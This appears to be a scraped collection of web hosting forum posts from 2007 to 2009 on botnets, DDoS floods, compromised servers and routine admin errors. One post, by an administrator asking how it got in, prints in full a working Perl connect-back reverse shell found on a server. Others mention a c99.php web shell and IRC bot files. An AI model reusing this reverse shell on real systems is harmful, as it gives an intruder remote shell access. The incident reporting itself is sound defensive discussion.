Botnet Found
Jan 5, 2008
Our Security Technician yesterday found a 200-user botnet on a hidden IRC server and was able to quickly email the compromised systems' information (just hostname) to our abuse email. So today I spent the last 2 hours sending emails off to web hosting companies, educational institutions and corporate companies telling them that their systems have been compromised; we regularly email out systems we have found compromised. The thing that stuns me is that most of the systems we found compromised on IRC are on dedicated lines between 10MBPS and 1GBPS... I found a few hosting companies and will list them so they can be found by them:
Aug 19, 2008
Well, using Apache it can be DDoSed off very easily if not set up correctly.
Now the thing you want to do is set 25 connections per IP in the firewall, so that it only allows an IP 25 connections.
Botnet DDoS attacks always use high connection counts like 50 - 100, and with it set at 25 it'll ban the IP faster.
A normal user should only have 12 connections to the server.
Apache settings: I would say how to, but I don't have Apache right now. I use LiteSpeed.
Nov 3, 2009
I got a botnet attack on my web server... is there anything I can do to block these attacks? My host isn't much help.
Jul 23, 2007
Been having an annoyance lately. This kid has been DDoSing a site on my server for 3 days. It has absolutely no effect on the server besides filling up iptables rules and annoying the crap out of me with IP ban emails. So not really a problem as far as knocking my server offline, but the guy has been trying for 3 days and it's annoying as heck.
So I got someone to track the net down for me; it's located on 208.110.**, port 5050 and port 5520.
I will post the full details if it is ok with mods
So I emailed their abuse the other day, no response, tried calling, nothing but answering machines. Nothing has been done.
This guy must really have some connections inside datacenters because I was seeing where he had botnets on fdc, they got reported and fdc sent him the abuse reports so he could attack them some more!
[url]
Yes, this really happened, and fdc even protected the guy's identity by editing his name and info out of the complaint post.
Anyway, I got to talking to some other webmasters; he has had his botnet on wholesaleinternet a few months now. It has been reported repeatedly with no action taken, and no one can even get ahold of anyone at the datacenter. So either they just ignore the same abuse report for months or they know exactly what he is doing and don't care. Either way they won't shut him down for nothing.
I've sent reports to the registrar today; let's hope they are the ones to take action. And hopefully someone who works at wholesaleinternet will see this thread and finally be shamed into doing something. Or if anyone knows anyone who works there, please pass this on.
Feb 1, 2007
I am getting a huge DDoS attack on one of my servers. The botnet attacks come from Turkey's IP block, where the computers have dynamic IPs; every IP sends 1 packet of 48 bytes and closes the connection, to ports 80, 22, 110 and 25, so the machine became inaccessible because of the SYN attack. What would you advise? Do you advise the Cisco PIX series or LayeredTech's DDoS protection? Cisco PIX 501 - 1 Server Only - $99 Monthly Charge - $49 Set Up. I can buy this. There are 1834 IPs banned by the software firewall. I am thinking: can this Cisco PIX handle such an attack?
Nov 7, 2009
Staminus Communications has been hosting a botnet forum, which distributes bots, worms, trojans, illegal clickers, and tons more. 95% of the site is illegal, and is forbidden by Staminus's provider, yet they could care less as long as they get their money. I sent an abuse letter August 17th 2009; they even admitted things were illegal on the site. I pointed out several, like the Google Adsense clicker bot, which is highly illegal and which is nothing close to the other content hosted and/or linked to.
They are hosting unkn0wn.ws; they refuse to remove the site or make them remove the illegal content, which is most of the forum, which now forces me to send a letter to their provider and the cybercrime which I am now doing.
Now I guess they do not care about what they host, only if the person pays, so I guess I'm just going to expose it here for everyone to notice, because it's just going to get their data center raided over time by hosting illegal content and not removing it.
Let's see what you guys think, or what the admins have to say when they read this post.
What do you guys think: when a provider does nothing about illegal content, do you think it's the employees that are at fault or the customer?
Sep 22, 2007
A DDoS attack is running against one of my root servers, apparently from a botnet; however, all requests have the same Referer. Who can give me tips on how I can prevent the attacks? Preferably just stop them via the Referer?
Apr 4, 2007
Found a suspicious script running on a server in /dev/shm
Code:
#!/usr/bin/perl
use IO::Socket;
$system = '/bin/sh';
$ARGC=@ARGV;
print "Connect Back (S) 2007\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port]\n";
die "Ex: $0 127.0.0.1 2121\n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Connecting... $ARGV[0]\n";
print "[*] Spawning Shell\n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
system("unset HISTFILE; unset SAVEHIST ;echo;id;uname -a;w");
system($system);
#EOF
Removed it, changed all passwords, etc, anyone know how this might've gotten into /dev/shm? ( CentOS 4.4 )
Jun 11, 2009
We were tasked with helping a website owner find all the malscripts on his site and remove them. He, like many, learned that his site was delivering malicious code with an email from Google.
This website owner had tried removing the code himself and yet his site was still blacklisted by Google. This was killing his sales as anyone visiting with Firefox as their browser, or Chrome, were greeted with a big warning:
This site may harm your computer.
After about a week of trying to rectify the problem himself, he contacted us.
He provided us FTP access to his site so we could tackle it.
After downloading his site (which literally took 3 hours) we started scanning. We grep'd for the word "base64_decode" and found over 228 php files all with the following malscript (spaces added to protect the innocent):
Code:....
Mar 16, 2009
I have a valid SSL certificate for the website but it still shows an address not found error. But sometimes it just works fine.
Is it related to a DNS issue?
May 11, 2008
I do not know where to post this, I recently changed Hosts.
My domain through GoDaddy was changed to my new account that was setup, The issue is everyone else can see my website but me and I am not sure why?
On my end I get Server Not Found?
I can see my site through a Proxy and also I have shown the site to a few people and they have no issues accessing it...
Dec 1, 2008
For the first time after running a server for about a year I decided to buy a new server, and I found out that there is some sort of infection in it. What should I do next? The logs are attached in an attachment.
Attached Files
rootkit.log.txt (9.4 KB, 70 views)
May 17, 2008
I can't visit my website! <snipped> Every time I go it says server not found. So I told some friends to go and they are able to see and visit <snipped>. How is that possible? They could and I can't? Yesterday it was the same thing, but then a couple of hours later it worked and I could visit hmlegends.com, but I didn't do anything, and now today it's the same thing: server not found! I cleaned my history, everything, and still server not found!
So what I did is use a proxy <snipped> and then it worked!
But when I don't use a proxy: SERVER NOT FOUND! It's like my IP can't reach hmlegends.com
I don't know how to solve this! It just says server not found!
But it looks like everyone else could access it!
Anyway, I'm using Firefox 2, but then I thought maybe it was my browser, so I switched to 3, so I'm currently on Firefox 3,
and no, it's not that; it's something with my IP, because when I use a proxy I can go to my site,
but the point is I don't want to use a proxy; I want to use my IP to go to hmlegends.com
Also I'm using dial-up Internet!
I use AOL Dialer to connect!
AOL Dialer 4.8.8.4
Apr 27, 2008
I have recently bought a VPS hosting package. At the moment I am going through the tutorials on the net that I researched before getting a VPS package, to give me some understanding of what I need to do to secure the server and also how to install the software that I require.
For most of today, I have been trying to sort out a problem that I am currently having.
That is, I am trying to work through a part of a tutorial from a website that requires the use of apt commands.
But for every command I am getting the message back apt..... Command not found. I am currently using the ubuntu operating system. And through some research, I have got the feeling that I might have the bare installation done on my server to just make it work.
Would I be right, and with the bare installation apt commands wouldn't be installed?
If I am, how would I go about installing the Apt commands and anything else that I might require?
Feb 22, 2008
I got a new BOX, i see 'cronjob' not working,
cronjob
-bash: cronjob: command not found
I installed
yum install vixie-cron.i386
Still
cronjob
-bash: cronjob: command not found
# cron
-bash: cron: command not found
how can i get 'cronjob' working?
Jan 20, 2008
I upgraded from Apache 1.3.7 to the latest copy
Everything works nicely, except the cgi-bin directory
When a user tries to access a script or even a standard text file, it throws up the error..
Not Found
The requested URL /cgi-bin/first.txt was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When they try and access the cgi-bin directory itself, they get
Forbidden
You don't have permission to access /cgi-bin/ on this server
Now, I've checked the httpd.conf file and this is what it has for Cgi-bin
<IfModule alias_module>
ScriptAlias /cgi-bin/ "/usr/local/apache/cgi-bin/"
</IfModule>
<Directory "/usr/local/apache/cgi-bin">
AllowOverride None
Options None
Order allow,deny
Allow from all
</Directory>
And the error logs say..
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] File does not exist: /home/goewowc/public_html/404.shtml
[Sun Jan 20 18:09:56 2008] [error] [client xx.xx.xx.xx] script not found or unable to stat: /usr/local/apache/cgi-bin/first.txt
The CGI-bin directory is chmodded correctly, the files are also chmodded and belong to the correct group
Nov 16, 2007
While I am installing some programs there is a problem with my PHP:
PHP GD Module Not Found
How could I install it over SSH as root?
Mar 21, 2008
After going back and forth with the folks that are supposed to be managing my server they finally checked and found an irc bot. Here is their message:
I have found a irc bot running on your server. The binaries are located at /var/lib/texmf/.dat/. You can see the tar file which the hacker uploaded at /var/lib/texmf/. I have changed the permissions to 000 so that you can verify the files.
The user of the files are nobody. Hence it is clear that the files were uploaded via url injection using some vulnerable script under some domain. Unfortunately there are no helpful logs to find the exact domains and the vulnerable script. It is certain that the files were first uploaded to /tmp and then moved from there. You can see some similar hack files at /tmp/.dat, /tmp/var and /tmp/.dev12. Also the permission of /var/lib/texmf/ was 777.
You should update all your web software to the latest versions so that they include the latest security patches. Also I recommend you enable mod_security on your server to prevent further hacks.
Let us know if you want this to be enabled.
Apr 21, 2007
My server use cPanel 10x
CentOS
how to fix this problem?
php: /usr/lib/libmysqlclient.so.14: version `libmysqlclient_14' not found (required by php)
Sep 27, 2007
I just found a script on a customer's account after some problems they were having. They mentioned injecting PHP code, which immediately threw up a red flag; when I took a look I found c99.php
I checked up and this seems to be the web equivalent of a rootkit.
Are there any legitimate reasons for this script? The customer is one of the strangest I've come across because he had the lowest fraud score yet, used a lady's name at signup/payment, yet calls himself Michael and seemed to do something with WHMCS security-wise.. I don't want to post details as checks are still ongoing, but it seems to be a problem with Language scripts, and the customer was able to sign up on a monthly plan but biannually... so no more invoices till 2009 ... strange, although whether this was done innocently or is a known security hole in WHMCS is not known yet.
May 10, 2007
after a day of crappy performance from one of my VPS accounts, I decided to start digging, and found eggdrop, and couple of other not so nice files in my /tmp directory.
I panicked, of course, and removed all traces of anything I could find that was bad, so I've unfortunately got no way to see how it happened, as far as I know (but I'm far from a security expert)
I need your help in shutting the system down to users. This is an HTTP/SSH/SMTP/POP3/IMAP server.
Tell me what you need to know and I will do my best to get it to you. Basically I'm just frustrated that I've been on it for 3 hours now.....wasting time because some SOB was bored....
Dec 31, 2007
How can I find the spammer on our server?
One of our customers is trying to send mail with a PHP file, but I cannot find this account. Can you help me find this user?
Apr 26, 2009
I'll try to make this long story short, but this morning I logged into one of my servers and it showed a read-only filesystem, which I thought my server guys could fix easily. So I put in a ticket. 6 hours later, they tell me that they think the OS is corrupted and I need a new install. They give me KVM over IP so I can go in and 'do' things. I tried to log in as root and it wouldn't let me, so they finally booted in single mode and I can get in and such. When I try to su - root, it tells me that user root can't be found. I also tried to ftp into and out of the server with no luck. I really need this box back up. If not, I need to get all the accounts saved off so that I can build a new box. Everything is there, so I don't want to give up yet.
Sep 3, 2009
When I was a customer at hostgator, whenever a terminating error within php was displayed it would log in the parent directory in a file called "error_log".
I want this to happen now on our dedicated server. I've looked at my local apache error log and it doesn't appear to show the same info as hostgator's setup showed.
Can anyone tell me how to set that up?
Apr 28, 2009
I'm setting a local server on my network. Leopard 10.5.6
I went to mysql.com and installed the intel 32-bit version of mysql (package).
After install, I try to run the mysqladmin command, but it returns command not found.
I search for the location using
which mysql
nothing returns.
I find the install here:
/usr/local/mysql-5.1.34-osx10.5-x86/bin
Even when I check the file and it's there, running the command returns
mysqladmin: command not found
Mar 29, 2009
I have this setup on CPanel
php -q /home/host/public_html/clients/admin/cron.php
but I get this:
sh: -t: command not found
sh: -t: command not found
sh: -t: command not found
sh: -t: command not found
May 15, 2008
I am trying to access a temporary url on cPanel but I get a 404 Not Found error....
Mar 31, 2008
I have to create a new client in my AWStats / Plesk panel,
without a domain.
I just want to test some programmers via the [url]..
but there is nothing open!
I think it is a misconfiguration of the Apache/httpd process inside
your VPS
[url]
[url]
i locate my httpd.conf file its were here
PHP Code:
[root@secure vb]# locate [url]
Dec 14, 2007
I've been facing a problem for the last 48 hours. When I try to access my site
www.yourdomain.com/forum
it shows me a Page not found error:
Not Found
The requested URL /forum was not found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
When I checked this forum folder through the shell and cPanel, it's there, and when I try to access it through
[url]
it works fine. Does any of you know what the problem is? Please help me; my site has already been closed for 48 hours. God bless you.
Mar 25, 2007
any hints on the reason of "--with-mime-magic: not found" when compiling PHP?
FreeBSD 6.1
Apr 7, 2007
I just found the following KVM over IP device with 16 ports:
[url]
You can get it for 747 € ( plus VAT ) and it comes with 2 CPU cables. Each additional cable costs only 5.80 €. For 828 € you can manage 16 servers, 52 € per server.